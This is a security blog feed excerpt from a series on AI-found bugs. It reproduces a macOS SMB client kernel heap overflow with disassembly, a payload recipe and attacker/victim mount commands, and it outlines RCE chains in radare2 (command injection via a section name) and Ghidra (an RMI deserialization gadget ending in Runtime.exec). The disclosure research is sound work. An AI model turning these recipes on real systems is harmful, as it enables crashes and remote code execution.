<a href="https://support.apple.com/en-us/126794">security notes</a> list a few dozen CVEs across the usual lineup: WebKit, Kernel, AppleMobileFileIntegrity, CoreAudio, the gang's all here.</p><p>Claude dutifully built a TODO for each one, ranked them, and reproduced two of the SMB entries. The trigger for what we believe is CVE-2026-28835 turned out to be flaky, so this post focuses on the other one, which we believe is CVE-2026-28825:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">Available for: macOS Tahoe
Impact: An app may be able to modify protected parts of the file system
Description: An out-of-bounds write issue was addressed with improved bounds checking.
CVE-2026-28825: Sreejith Krishnan R</code></pre></div><p><em>A caveat on those CVE numbers: the advisory has several SMB entries with near-identical wording, and Apple does not tell you which line maps to which function, so our mapping from "this <code>cmp</code>/<code>b.hi</code> in <code>smb2_rq_decompress_read</code>" to "CVE-2026-28825" is best-effort. The vulnerability is real and verified against a 26.3.2 kernel.</em></p><p><em>In hindsight it's a sensible pick. "Out-of-bounds write &#8230; improved bounds checking" usually means a single inserted compare-and-branch, which is about the cleanest bindiff signal you can hope for; smbfs ships in the boot kernelcache, so both versions can be carved out with <code>ipsw</code> and diffed as a single binary rather than chased across two dyld shared caches; and SMB is a network filesystem, so whatever "an app" is doing to trigger this, a server on the other end of a socket can probably do too. The agent's initial assessment was that the PoC would amount to "a Python server," which turned out to be doing a tremendous amount of work, but we'll get there.</em></p><h2>The patch</h2><p>Claude pulled both kernelcaches and carved out the smbfs kext. If you want to follow along at home, <a href="https://github.com/blacktop/ipsw"><code>ipsw</code></a> will fetch just the kernelcache out of Apple's CDN without making you download the full multi-GB restore image:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh"># 26.3.2 is no longer signed, so use the appledb index rather than ipsw.me
ipsw download appledb --os macOS --device VirtualMac2,1 --build 25D2140 --kernel -y -o old
ipsw download appledb --os macOS --device VirtualMac2,1 --build 25E246  --kernel -y -o new

# carve smbfs out of each kernelcache
ipsw kernel extract old/25D2140__VirtualMac2,1/kernelcache.release.VirtualMac2,1 \
    com.apple.filesystems.smbfs -o old
ipsw kernel extract new/25E246__VirtualMac2,1/kernelcache.release.VirtualMac2,1 \
    com.apple.filesystems.smbfs -o new</code></pre></div><p>Then, rather than diffing every function like some kind of animal, it did what every reverser does first and diffed the strings. <code>ipsw macho info --strings</code> prefixes each line with its load address, which moves between builds, so strip that and sort before comparing:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh">diff &lt;(ipsw macho info old/com.apple.filesystems.smbfs --strings --no-color | sed 's/^0x[0-9a-f]*: //' | sort) \
     &lt;(ipsw macho info new/com.apple.filesystems.smbfs --strings --no-color | sed 's/^0x[0-9a-f]*: //' | sort)</code></pre></div><p>And Apple, bless them, had left a little present:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">296a297
&gt; "%s: compress_len %u &gt; originalCompressedSegmentSize %u \n"
546a548
&gt; "%s: Freeing con with unexpected state of 0x%x?"</code></pre></div><p>A brand-new error string of the form "X &gt; Y" appearing in a security update is the bindiff equivalent of a neon sign that says BUG WAS HERE. The string's only xref is inside <code>smb2_rq_decompress_read</code>, the function had grown by exactly 60 bytes between versions, and the entire delta was this:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;asm&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-asm">; macOS 26.4, smb2_rq_decompress_read +0x6d4
loc_fffffe0009b7cb9c:
    cmp   w9, w8                ; w9 = compress_len, w8 = OriginalCompressedSegmentSize
    b.hi  loc_fffffe0009b7cdec  ; &#8594; log the new string, return EBADRPC
    mov   w2, w9
    ...
    bl    _md_get_mem</code></pre></div><p>So the fix is "before copying <code>compress_len</code> bytes into a buffer, check that <code>compress_len</code> fits in the buffer," and you can probably guess what the bug is.</p><h2>The root cause</h2><p>This is where it usually gets slow for humans, because <code>smb2_rq_decompress_read</code> is ~800 instructions of nested header parsing for the SMB 3.1.1 compression transform. SMB 3.1.1 actually defines two flavours of that transform: <em>unchained</em> (<a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/0d8c3ee8-1ca6-4847-a860-50e0cdab38b2">MS-SMB2 &#167;2.2.42.1</a>), which is one header followed by one compressed blob, and <em>chained</em> (<a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/aa880fe8-ebed-4409-a474-ec6e0ca0dbcb">&#167;2.2.42.2</a>), which is one outer header followed by a list of payload chunks, each carrying its own algorithm and length so different slices of the same message can be compressed differently. Apple's parser handles both in one function, splitting on a session flag, and the bug lives in the chained branch.</p><p><em>The agent had to work out which branch was which from the disassembly alone, which meant matching the field layouts each arm parses against &#167;2.2.42.1 vs &#167;2.2.42.2 until one of them lined up. This is precisely what a human would do, minus the part where the human opens fourteen browser tabs of Microsoft Learn and emerges three hours later unsure whether the Strait of Humorz remains closed.</em></p><p>The agent's full disasm walkthrough is in <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/ANALYSIS.md">agent/ANALYSIS.md</a>; here's the fun part. When the smbfs client receives a frame starting with <code>\xfcSMB</code>, it parses the outer transform header and allocates a scratch buffer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;asm&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-asm">; OriginalCompressedSegmentSize from the wire &#8594; [sp+0x4c], capped only at 8 MiB
:206  lsl   w19, w8, #0x1        ; w19 = OCSS * 2
:209  bl    &lt;kalloc_data&gt;        ; alloc(2 * OCSS)   &#8592; attacker picks the zone, how thoughtful
:211  mov   x20, x0
:218  add   x23, x20, x8         ; output half = x20 + OCSS</code></pre></div><p>The buffer is <code>2 &#215; OriginalCompressedSegmentSize</code>: front half for compressed input, back half for decompressed output. <code>OriginalCompressedSegmentSize</code> comes straight off the wire with only an 8 MiB cap, which means the attacker gets to pick which kalloc zone this lands in.</p><p>Then it loops over chained payload chunks, and each chunk header has <em>two</em> attacker-controlled sizes: <code>OriginalPayloadSize</code> (how big this chunk will be <em>after</em> decompression) and <code>Length</code> (how many compressed bytes are on the wire <em>right now</em>). Watch carefully:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;asm&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-asm">:567  bl    _md_get_uint32le      ; OriginalPayloadSize &#8594; [sp+0x3c]
:585  ldr   w8, [sp, #0x3c]       ; OriginalPayloadSize
:587  sub   w9, w9, w24           ; remaining output budget
:588  cmp   w8, w9
:589  b.hi  error                 ; &#10003; decompressed size fits in output half? great!

:590  ldr   w9, [sp, #0x44]       ; Length
:591  subs  w8, w9, #0x4          ; compress_len = Length - 4
:610  mov   w2, w8                ; size = compress_len   &#8592; wait, nobody checked this one
:612  mov   x1, x20               ; dst  = the OCSS-byte input half
:614  bl    _md_get_mem           ; memcpy(heap, wire, compress_len)  &#8592; oh no</code></pre></div><p>It carefully validates that the <em>decompressed</em> size will fit in the <em>output</em> half, then copies the <em>compressed</em> bytes into the <em>input</em> half without checking them at all. The only constraint on <code>Length</code> is "are there that many bytes left in the mbuf chain?", and since we're the server, there are exactly as many bytes as we feel like sending.</p><p>So the recipe writes itself: send <code>OriginalCompressedSegmentSize = 0x100</code> to get a cute little <code>kalloc(0x200)</code> buffer, send <code>OriginalPayloadSize = 0x80</code> to pat the bouncer on the head, then send <code>Length = 0x10000</code> followed by 64 KiB of <code>0x41</code>. The <code>md_get_mem</code> happily writes <code>0xFFFC</code> bytes into a 512-byte allocation and keeps on trucking through whatever's next door.</p><h2>The catch (that wasn't)</h2><p>While tracing the dispatch path in <code>smb_iod_recvall</code>, Claude found a gate in front of the vulnerable function:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;asm&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-asm">ldr  w8, [session+0x620]   ; negotiated compression algorithm bitmap
cbz  w8, normal_parse      ; if 0, never reach smb2_rq_decompress_read</code></pre></div><p>It then went looking for what controls that field, found the <code>comp_algorithms_map</code> option in <code>nsmb.conf</code> (default <code>0</code>), and concluded the bug was only reachable if the victim had gone out of their way to enable SMB compression. That assessment is baked into <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/ANALYSIS.md"><code>agent/ANALYSIS.md</code></a>, <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/README.md"><code>agent/README.md</code></a>, and the warning <code>server.py</code> prints when the client doesn't offer a compression context. On that basis the agent wrote this up as a lab curiosity rather than something you'd worry about in the wild.</p><p><em>Hold that thought.</em></p><h2>The PoC</h2><p>The actual overflow payload, <code>build_overflow_payload()</code>, is about 25 lines. The other ~750 lines of <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/server.py"><code>server.py</code></a> are the agent slowly discovering that <code>mount_smbfs</code> is an extremely picky conversational partner. Here is what macOS demands before it will deign to issue a READ:</p><ul><li><p><strong>Multi-protocol negotiate</strong>: an SMB1 <code>0xFF SMB</code> hello answered with an SMB2 wildcard, like it's 2006.</p></li><li><p><strong>NEGOTIATE</strong>: dialect <code>0x0311</code>, a preauth integrity context, and the compression context with <code>COMPR_FLAG_CHAINED</code> + <code>LZ77_HUFFMAN</code> that makes any of this reachable in the first place.</p></li><li><p><strong>SESSION_SETUP &#215;2</strong>: raw NTLMSSP Type-1/2/3, <em>not</em> SPNEGO-wrapped, because macOS 26 decided SPNEGO is for other people.</p></li><li><p><strong>TREE_CONNECT</strong>: <code>ShareType=DISK</code>, full access, no questions asked.</p></li><li><p><strong>Compounded CREATE/QUERY_INFO/CLOSE</strong>: mount-time probes chained via <code>NextCommand</code>, because one request at a time is for cowards.</p></li><li><p><strong>IOCTL <code>FSCTL_VALIDATE_NEGOTIATE_INFO</code></strong>: echo the negotiate parameters back so the client doesn't accuse us of MITM'ing ourselves.</p></li><li><p><strong>QUERY_DIRECTORY <code>info_class=0x25</code></strong>: a <code>FileIdBothDirectoryInformation</code> entry saying yes, there's totally a 1 MiB file here.</p></li><li><p><strong>READ</strong>: finally, <em>finally</em>, <code>build_overflow_payload()</code>.</p></li></ul><p><em>This stage is where most of the wall-clock time went, though "most" is relative: the whole thing from advisory to confirmed panic was a few hours. You can reconstruct the wall-hitting from the artifacts: the client hangs up at SESSION_SETUP because macOS sends raw NTLMSSP rather than SPNEGO, then the compounded <code>NextCommand</code> mount-time probes need handling, then QUERY_DIRECTORY turns out to want info class <code>0x25</code> (<code>FileIdBothDirectoryInformation</code>), and so on. The <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/README.md#troubleshooting">troubleshooting section</a> of the agent's README and the test log at the bottom of it are basically the therapy journal.</em></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh"># attacker
sudo python3 server.py --host 0.0.0.0

# victim VM
mkdir -p /tmp/m
mount_smbfs -N //guest@&lt;attacker-ip&gt;/poc /tmp/m</code></pre></div><h2>The panic</h2><p>In our testing the target panics immediately on mount; you don't even get your shell prompt back before the VM stops being a VM and starts being a very expensive paperweight.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">panic(cpu 0 caller 0xfffffe0041ad1bb8): Kernel data abort. at pc 0xfffffe0041ad858c, lr 0x19c2fe0044ad2340 (saved state: 0xfffffeab785478a0)
      x0:  0xfffffe32db26bc64 x1:  0xfffffe393878c438  x2:  0x0000000000003b74  x3:  0xfffffe32db26c000
      x4:  0x0000000000000000 x5:  0x000000000000001c  x6:  0x0000000000000041  x7:  0x0000310353f6f896
      x8:  0x4141414141414141 x9:  0x4141414141414141  x10: 0x4141414141414141  x11: 0x4141414141414141
      x12: 0x4141414141414141 x13: 0x4141414141414141  x14: 0x4141414141414141  x15: 0x4141414141414141
      x16: 0x0000000000003fb0 x17: 0x8b6bfe0045015c00  x18: 0x0000000000000000  x19: 0x000000000000fffc
      x20: 0xfffffeab78547cf0 x21: 0x0000000000000000  x22: 0xfffffe1bad1de000  x23: 0xfffffe32db26bc64
      x24: 0x0000000000003f50 x25: 0xfffffe393878c07c  x26: 0x000000000000ff98  x27: 0xfffffe00453753a0
      x28: 0xfffffe1ba74efac8 fp:  0xfffffeab78547bf0  lr:  0x19c2fe0044ad2340  sp:  0xfffffeab78547bf0
      pc:  0xfffffe0041ad858c cpsr: 0x20401208         esr: 0x0000000096000047  far: 0xfffffe32db26c000

Probabilistic GZAlloc Report:
  Zone    : data_shared.kalloc.512
  Address : 0xfffffe32db26c000
  Element : [0xfffffe32db26be00, 0xfffffe32db26c000) of size 512
  Kind    : out-of-bounds (high confidence)
  Access  : 1 byte(s) past</code></pre></div><p>That's eight general-purpose registers screaming <code>AAAAAAAA</code> in unison, <code>x19</code> still holding our <code>0xfffc</code> copy length, <code>x6</code> holding the spray byte, and PGZ politely noting an out-of-bounds write past a 512-byte element in <code>data_shared.kalloc.512</code>, which is exactly where <code>kalloc_data(2 &#215; 0x100)</code> lands.</p><h2>The human expertise</h2><p>This is where the autonomous run ended and we picked it up. The agent had handed us a working PoC with one asterisk attached: "non-default config required, victim must set <code>comp_algorithms_map</code> in <code>nsmb.conf</code>." We wanted to know how critical that asterisk really was, so we did the laziest possible experiment: deleted the <code>nsmb.conf</code> provisioning from the trigger script, pointed it at a fresh, never-configured 26.3.2 VM, and ran it.</p><p>It panicked anyway. 100% of the time.</p><p>So much for the asterisk. Conveniently, Apple publishes the SMB client source at <a href="https://github.com/apple-oss-distributions/SMBClient">apple-oss-distributions/SMBClient</a>, so we don't even have to argue from disassembly.</p><p>To be clear, "we" here still means Claude. Our contribution to this section was deleting three lines from a shell script and typing "huh, why did that work?" into a chat box. The manual source-code audit that follows, like every other piece of manual labor in this post, is the model's work; we don't read C by hand anymore, we are not farmers.</p><p>There are two places smbfs touches compression at negotiate time, and they are not symmetric:</p><ul><li><p><code>smb2_smb_add_negotiate_contexts</code> builds the client's outgoing NEGOTIATE <em>request</em>. This is where <code>comp_algorithms_map</code> matters: with the default of <code>0</code>, the client doesn't include an <code>SMB2_COMPRESSION_CAPABILITIES</code> context in what it sends. The agent traced this side, saw the config gate, and stopped.</p></li><li><p><code>smb2_smb_parse_negotiate_contexts</code> parses the server's NEGOTIATE <em>response</em>, and it has no such gate. From <a href="https://github.com/apple-oss-distributions/SMBClient/blob/SMBClient-538.100.12/kernel/netsmb/smb_smb_2.c#L7138-L7161">smb_smb_2.c</a>:</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">/* Get CompressionAlgorithms */
for (i = 0; i &lt; compression_algorithm_cnt; i++) {
    error = md_get_uint16le(&amp;md_context_shadow, &amp;compression_algorithm);
    ...
    switch(compression_algorithm) {
        case SMB2_COMPRESSION_LZ77_HUFFMAN:
            sessionp-&gt;server_compression_algorithms_map |= SMB2_COMPRESSION_LZ77_HUFFMAN_ENABLED;
            break;
        case SMB2_COMPRESSION_LZ77:
            sessionp-&gt;server_compression_algorithms_map |= SMB2_COMPRESSION_LZ77_ENABLED;
            break;
        ...
    }
}</code></pre></div><p>There is no intersection check against the client's own algorithm map. The client never asked for compression, the server says "we'll be using LZ77+Huffman, thanks," and the client just writes it down. (The encryption and signing arms of the same <code>switch</code> <em>do</em> validate the server's choice; compression alone does not. There is even a stale comment a few lines up reading "We do not support compression, so can ignore this reply," presumably left over from before compression support was bolted on.) From that point on <code>server_compression_algorithms_map</code>, which is the field at <code>[session+0x620]</code>, is non-zero, the dispatch gate in <code>smb_iod_recvall</code> is satisfied, and every <code>\xfcSMB</code> frame goes straight to <code>smb2_rq_decompress_read</code>.</p><h2>The Microsoft connection</h2><p>While we had the source open we also found out <em>why</em> the bug exists in the first place, and it's too good not to share. Right above the missing check, in <a href="https://github.com/apple-oss-distributions/SMBClient/blob/SMBClient-532.80.3/kernel/netsmb/smb_crypt.c#L4178-L4194">smb_crypt.c</a>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">#if 0
    /*
     * Oddly, Windows server will send a compress length that
     * is bigger than the decompressed length which will cause
     * this check to fail. Why they dont just send the non
     * compressed data?
     *
     * Sanity check the compress length
     */
    if (compress_len &gt; (originalCompressedSegmentSize - CurrentDecompressedDataSize)) {
        SMBERROR("Algorithm %d compress_len %d &gt; remaining to decompress len %d? \n", ...);
        error = EINVAL;
        goto bad;
    }
#endif</code></pre></div><p>The bounds check was there. Someone <code>#if 0</code>'d it out because Windows Server tripped it, left a slightly exasperated comment, and shipped. The 26.4 fix doesn't re-enable this block; it adds a <a href="https://github.com/apple-oss-distributions/SMBClient/blob/SMBClient-538.100.12/kernel/netsmb/smb_crypt.c#L4248-L4266">looser check further down</a> that's tight enough to stop the overflow but slack enough to keep Windows happy. (If you want to diff it yourself: vulnerable through tag <code>SMBClient-532.80.3</code>, fixed in <code>SMBClient-538.100.12</code>.)</p><p><em>We asked Claude whether it laughed when it found that comment. It claimed it "doesn't experience humor the way humans do" and then blamed Microsoft for the bug, which as Apple fanbois we found to be very relatable.</em></p><h2>Conclusion</h2><p>To be clear about scope: we didn't ask Claude to find this bug, and it didn't. Credit for the discovery goes to Sreejith Krishnan R. What we asked Claude to do was the N-day grind: take a one-line advisory and a pair of kernelcaches, reverse-engineer the fix, work out the root cause, and build something that triggers it. That part ran end to end without a human opening IDA, and the gap between "Apple ships a patch" and "someone has a working trigger" just got a lot shorter.</p><p>The reachability miss is, if anything, the more interesting result. The agent assessed this as "gated behind a config nobody sets"; in reality it's "mount any share the attacker controls," which on macOS is a single click on an <code>smb://</code> link in Finder, Safari, or Messages. That's a meaningful swing in severity, and it tells you something about where the model is today: the taint tracking, the protocol scaffolding, the eight-stage SMB state machine were flawless, and the one thing it got wrong was a judgment call about which of two sibling functions controls a gate, where it stopped one xref short of the answer. That's exactly the kind of gap a human reviewer closes in ten minutes once the machine has done the other ninety-five percent, which is more or less the thesis of this whole series.</p><p>Everything the agent produced lives unedited under <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/"><code>agent/</code></a> in the repo: <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/README.md"><code>README.md</code></a>, <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/ANALYSIS.md"><code>ANALYSIS.md</code></a>, <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/REPORT.md"><code>REPORT.md</code></a>, plus <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/server.py"><code>server.py</code></a> at the top level. You'll see the "non-default <code>comp_algorithms_map</code> required" claim stated as fact throughout, because that's what the agent believed when it wrote them. We've left it that way on purpose; the unedited record of where it was right and where it was wrong is more useful than a cleaned-up one. The panic logs are in <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/panics/"><code>panics/</code></a>.</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: All Your Reverse Engineering Tools Are Belong to US]]></title><description><![CDATA[Ghidra, radare2, IDA Pro, and Binary Ninja Sidekick. If your tool doesn't show up here, it's not cool enough. Contact us for a free RCE.]]></description><link>https://blog.calif.io/p/mad-bugs-all-your-reverse-engineering</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-all-your-reverse-engineering</guid><pubDate>Tue, 21 Apr 2026 22:19:45 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/WxWw4dSxMCQ" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Two weeks ago we told you about how we used AI to find a <a href="https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero">radare2 0-day</a>, and the day after that, an <a href="https://blog.calif.io/p/mad-bugs-claude-found-an-auth-bypass">auth bypass in NSA&#8217;s Ghidra Server</a> that has been hiding in plain sight since 2019.</p><p>Some of you were, understandably, skeptical and unimpressed. Maybe AI got lucky.</p><p>So here are four more. All arbitrary code execution, all discovered with Claude or Codex. And if this still doesn't move you, well, it's OK. Denial is coping, we've been there.</p><h2>IDA Pro &amp; Binary Ninja Sidekick</h2><p>These two are under disclosure with Hex-Rays and Vector 35 respectively. We'll publish full details, PoCs, and our prompt logs when the embargoes lift.</p><p>What we <em>can</em> say:</p><ul><li><p>Both are arbitrary code execution.</p></li><li><p>Both trigger on the normal "open the thing someone sent you" workflow.</p></li></ul><div id="youtube2-WxWw4dSxMCQ" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;WxWw4dSxMCQ&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/WxWw4dSxMCQ?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><div id="youtube2-u2QaSAySqjw" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;u2QaSAySqjw&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/u2QaSAySqjw?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><h2>radare2</h2><p>When we <a href="https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero">reported the first radare2 PDB injection</a>, the fix landed the same day: base64-encode the symbol name before interpolating it into the <code>fN</code> command.</p><p>Except <code>print_gvars()</code> interpolates <em>two</em> attacker-controlled fields into RAD-mode output, and the fix only touched one of them. Four lines above the patched <code>fN</code> line, the raw 8-byte PE section header name still goes into the <code>f</code> command via <code>%.*s</code> with no sanitization at all:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">pdb-&gt;cb_printf ("f pdb.%s = 0x%" PFMT64x " # %d %.*s\n",
    filtered_name, ..., PDB_SIZEOF_SECTION_NAME,
    sctn_header-&gt;name);          // &lt;-- still raw from the binary</code></pre></div><p>Stick a <code>\n</code> in the section name and the <code>#</code> comment ends; whatever follows is a fresh r2 command. The catch is you only get 7 bytes per line &#8212; but a <a href="https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge">HITCON CTF 2017 "BabyFirst Revenge"</a>-style stager turns 7-byte writes into arbitrary-length <code>sh</code> execution. Two days after the first report, <a href="https://github.com/radareorg/radare2/issues/25752">#25752</a> went in and was fixed immediately.</p><p>The radare2 team turns around fixes faster than anyone else in this post. However, <strong>incomplete fixes are a bug class of their own</strong>, and AI is unreasonably good at finding them. It read the patch for #25731, asked "what <em>else</em> gets interpolated here?", and had a working PoC before we'd finished debating the merit of AI vulnerability research on X.</p><div id="youtube2-W7Jnp9AH-OU" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;W7Jnp9AH-OU&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/W7Jnp9AH-OU?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p>Write-up and PoC: <a href="https://github.com/califio/publications/tree/main/MADBugs/radare2-pdb-section-rce">https://github.com/califio/publications/tree/main/MADBugs/radare2-pdb-section-rce</a></p><h2>Ghidra</h2><p>This is NSA's tool, open-sourced in 2019, and now the default free reverse-engineering suite for most of the malware analysts, CTF players, and embedded reverse engineers who aren't paying for IDA.</p><p>This is also the one we want to spend time on, because the bug is simple but the exploit is genuinely fun.</p><p>Ghidra Server installs an <code>ObjectInputFilter</code> allow-list at startup so a malicious <em>client</em> can't send it deserialisation gadgets. The Ghidra <em>client</em> installs no such filter, so a malicious <em>server</em> can send the client whatever it wants. And opening a <code>.gpr</code> project file silently connects to whatever <code>ghidra://</code> URL is sitting in its <code>projectState</code> XML.</p><p>So: hand someone a Ghidra project, they double-click it, your server answers the very first RMI call (<code>reg.list()</code>, before any auth handshake) with a gadget chain instead of a <code>String[]</code>, and <code>Runtime.exec()</code> fires on their box.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;java&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-java">// ServerConnectTask.java &#8212; first thing the client does
Registry reg = LocateRegistry.getRegistry(server.getServerName(),
    server.getPortNumber(), new SslRMIClientSocketFactory());
checkServerBindNames(reg);          // &#8594; reg.list() &#8594; readObject() with NO filter</code></pre></div><p>"Java RMI deserialization" usually means "go grab a chain from ysoserial." However, the only fat jar on the default Ghidra client classpath is <code>jython-standalone-2.7.4.jar</code>, and Jython 2.7.4 specifically patched the classic ysoserial <code>Jython1</code> chain by adding a <code>readResolve()</code> tripwire to <code>PyFunction</code>.</p><p>So we asked AI to go looking for another <code>Serializable</code> + <code>InvocationHandler</code> in the same jar, and found one the Jython devs missed: <code>org.python.core.PyMethod</code>.</p><p>The chain wires <code>PyMethod.__func__</code> to the package-private <code>BuiltinFunctions</code> table at <code>index=18</code> &#8212; which is <code>__builtin__.eval</code> &#8212; and feeds it a <code>PyBytecode</code> object. <code>PyBytecode</code> is Jython's <em>CPython 2.7 opcode interpreter</em>, and serialises cleanly. The payload is 21 bytes of CPython bytecode that pulls <code>java.lang.Runtime</code> out of <code>co_consts</code> and calls <code>exec</code>.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">PriorityQueue.readObject
  &#9492;&#9472; siftDownUsingComparator
    &#9492;&#9472; Proxy(Comparator).compare      &#8592; PyMethod is the InvocationHandler
      &#9492;&#9472; PyMethod.__call__
        &#9492;&#9472; BuiltinFunctions[18]       &#8592; __builtin__.eval
          &#9492;&#9472; eval(PyBytecode, g, l)
            &#9492;&#9472; CPython 2.7 interpreter
              &#9492;&#9472; Runtime.getRuntime().exec({"/bin/sh","-c",CMD})</code></pre></div><p>A Java deserialisation chain that bottoms out in a Python bytecode VM. We think that's a first.</p><p>The victim sees one error dialog <em>after</em> the calculator has already popped &#8212; <code>PySingleton cannot be cast to Integer</code>, which is just <code>PriorityQueue</code> being confused about what it got back. By then it doesn't matter.</p><div id="youtube2-KXFTbr43HQo" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;KXFTbr43HQo&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/KXFTbr43HQo?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p>Write-up and PoC (to be uploaded): <a href="https://github.com/califio/publications/tree/main/MADBugs/ghidra-rmi-rce">https://github.com/califio/publications/tree/main/MADBugs/ghidra-rmi-rce</a>.</p><p>This affects every Ghidra release &#8805; 9.1. The fix is the obvious one: install the same serial filter on the client that already ships for the server. We've sent a patch.</p><p>And yes, we're aware we just dropped a 0-day on an NSA product (again!). Relax, disclosure cops. taviso is in the house.</p><p>Also, if the NSA is half as good at this as everyone says, they already knew. We're just bringing the rest of you up to speed.</p><div><hr></div><p><em>The MAD Bugs series runs through April 2026. Full index at <a href="https://blog.calif.io/t/madbugs">blog.calif.io/t/madbugs</a> and <a href="https://github.com/califio/publications/tree/main/MADBugs">github.com/califio/publications</a>.</em></p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: "cat readme.txt" is not safe in iTerm2]]></title><description><![CDATA[Turning "cat readme.txt" into arbitrary code execution in iTerm2.]]></description><link>https://blog.calif.io/p/mad-bugs-even-cat-readmetxt-is-not</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-even-cat-readmetxt-is-not</guid><pubDate>Fri, 17 Apr 2026 18:24:59 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/1a02736f-409b-4fac-879f-7f0fcaaad68d_2318x1326.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In a previous post about <a href="https://blog.calif.io/p/mad-bugs-month-of-ai-discovered-bugs">AI-discovered bugs</a> in <a href="https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude">Vim and Emacs</a>, 